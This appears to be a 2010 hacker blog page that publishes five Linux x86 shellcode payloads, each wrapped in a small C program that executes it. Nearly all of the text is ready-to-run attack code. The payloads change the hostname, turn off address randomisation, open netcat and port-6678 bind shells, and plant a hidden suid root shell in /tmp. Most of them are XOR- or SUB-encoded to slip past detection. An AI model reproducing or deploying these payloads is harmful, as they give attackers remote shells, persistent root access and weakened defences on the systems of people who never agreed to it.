break a time, with break the c0de…

shellcode

set hostname to c0debreaker linux shellcode


This shellcode is make your hostname to c0debreaker…

/*
Title  : sethostname to "c0debreaker" linux shellcode .
Name   : 37 bytes sethostname to "c0debreaker" linux .
Date   : Fri Aug  6 21:41:20 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : https://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>

char shellcode[] =
		"\xeb\x13"                    /* jmp    0x8048075 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x4a"                    /* mov    $0x4a,%al */
		"\x5b"                        /* pop    %ebx */
		"\x31\xc9"                    /* xor    %ecx,%ecx */
		"\xb1\x0b"                    /* mov    $0xb,%cl */
		"\xcd\x80"                    /* int    $0x80 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\xb0\x01"                    /* mov    $0x1,%al */
		"\x31\xdb"                    /* xor    %ebx,%ebx */
		"\xcd\x80"                    /* int    $0x80 */
		"\xe8\xe8\xff\xff\xff"        /* call   0x8048062 */
		"\x63\x30"                    /* arpl   %si,(%eax) */
		"\x64\x65\x62\x72\x65"        /* bound  %esi,%fs:%gs:0x65(%edx) */
		"\x61"                        /* popa    */
		"\x6b"                        /* .byte 0x6b */
		"\x65"                        /* gs */
		"\x72";                       /* .byte 0x72 */
		

int main(void)
{
		fprintf(stdout,"[*] Shellcode length: %d\n",strlen(shellcode));
		((void (*)(void)) shellcode)();
	
		return 0;
}
Advertisements

echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .


/*
Title  : echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Name   : 111 bytes echo 0 > /proc/sys/kernel/randomize_va_space SUB encoded linux shellcode .
Date   : Mon Jul  5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : https://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x57\x80\x44\x0e\xff\x01"
	     	   "\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff"
	     	   "\x5f\x30\xbf\x30\xd1\xaf\x0a\x51\x67\x6d\x2e\x72"
	     	   "\x67\x67\x2e\x2e\x61\x68\x88\xe2\x51\x67\x2c\x62"
	     	   "\x62\x62\x88\xe0\x51\xea\x06\x50\x52\x88\xe0\xcc"
	     	   "\x7f\x60\xe7\xf3\xfe\xfe\xfe\x64\x62\x67\x6e\x1f"
	     	   "\x2f\x1f\x3d\x1f\x2e\x6f\x71\x6e\x62\x2e\x72\x78"
	     	   "\x72\x2e\x6a\x64\x71\x6d\x64\x6b\x2e\x71\x60\x6d"
	     	   "\x63\x6e\x6c\x68\x79\x64\x5e\x75\x60\x5e\x72\x6f"
	     	   "\x60\x62\x64";
		
int main(void)
{
	fprintf(stdout,"Length: %d\n",strlen(shellcode));
	(*(void(*)()) shellcode)();
}

nc -lp 31337 -e /bin//sh polymorphic linux shellcode .


/*
Title  : nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
Name   : 91 bytes nc -lp 31337 -e /bin//sh polymorphic linux shellcode .
Date   : Mon Jul  5 16:58:50 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : https://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x43\x80\x6c\x0e\xff\x35\x80\xe9\x01"
		   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
		   "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
		   "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
		   "\xb5\x96\x1d\x29\x34\x34\x34\xa3\x98\x55\x62\xa1\xa5\x55\x68"
		   "\x66\x68\x68\x6c\x55\x62\x9a\x55\x64\x97\x9e\xa3\x64\x64\xa8"
		   "\x9d";
		
int main(void)
{
	fprintf(stdout,"Length: %d\n",strlen(shellcode));
	(*(void(*)()) shellcode)();
}

bind port to 6678 XOR encoded polymorphic linux shellcode .


/*
Title  : bind port to 6678 XOR encoded polymorphic linux shellcode .
Name   : 125 bind port to 6678 XOR encoded polymorphic linux shellcode .
Date   : Tue Jul  6 01:52:33 WIT 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : https://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x65\x80\x74\x0e\xff"
		   "\x0a\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff"
		   "\xff\xff\x3b\xca\x3b\xd1\x3b\xd8\x5a\x60\x0b"
		   "\x60\x08\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83"
		   "\xcc\x58\x62\xb1\x08\x10\x70\x83\xeb\x60\x1a"
		   "\x5b\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x58"
		   "\x5c\x83\xeb\xb9\x0e\xba\x6c\xc7\x8a\x58\x58"
		   "\x5c\x83\xeb\xf4\xc9\xba\x6c\xc7\x8a\x83\xc9"
		   "\x3b\xc3\xba\x35\xc7\x8a\x4b\xba\x35\xc7\x8a"
		   "\x4b\xba\x35\xc7\x8a\x58\x62\x25\x25\x79\x62"
		   "\x62\x25\x68\x63\x64\x83\xe9\x58\x59\x83\xeb"
		   "\xba\x01\xc7\x8a";

		
int main(void)
{
	fprintf(stdout,"Length: %d\n",strlen(shellcode));
	(*(void(*)()) shellcode)();
}

161 bytes Drop suid shell root in /tmp/.hiddenshell linux polymorphic shellcode


/*
Title  : Drop suid root shell in /tmp/.hiddenshell linux polymorphic shellcode .
Name   : 161 bytes Drop suid shell root in /tmp/.hiddenshell linux polymorphic shellcode
Date   : Sat Jun  17 21:27:03 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : https://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org), loneferret (offensive-security.com)
greetzz to all devilzc0de, jasakom, yogyacarderlink, serverisdown, indonesianhacker and all my friend !!
*/

#include <stdio.h>

char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x89\x80\x6c\x0e\xff\x35\x80\xe9\x01"
		   "\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x95\x66\xf5\x66\x07\xe5"
		   "\x40\x87\x9d\xa3\x64\xa8\x9d\x9d\x64\x64\x97\x9e\xbe\x18\x87"
		   "\x9d\x62\x98\x98\x98\xbe\x16\x87\x20\x3c\x86\x88\xbe\x16\x02"
		   "\xb5\x96\x1d\x29\x34\x34\x34\x98\xa5\x55\x64\x97\x9e\xa3\x64"
		   "\x64\xa8\x9d\x55\x64\xa9\xa2\xa5\x64\x63\x9d\x9e\x99\x99\x9a"
		   "\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d\xa4\xac\xa3\x55\xa7"
		   "\xa4\xa4\xa9\x6f\xa7\xa4\xa4\xa9\x55\x64\xa9\xa2\xa5\x64\x63"
		   "\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1\x70\x55\x98\x9d"
		   "\xa2\xa4\x99\x55\x69\x6c\x6a\x6a\x55\x64\xa9\xa2\xa5\x64\x63"
		   "\x9d\x9e\x99\x99\x9a\xa3\xa8\x9d\x9a\xa1\xa1";
		
int main(void)
{
	fprintf(stdout,"Length: %d\n",strlen(shellcode));
	(*(void(*)()) shellcode)();
}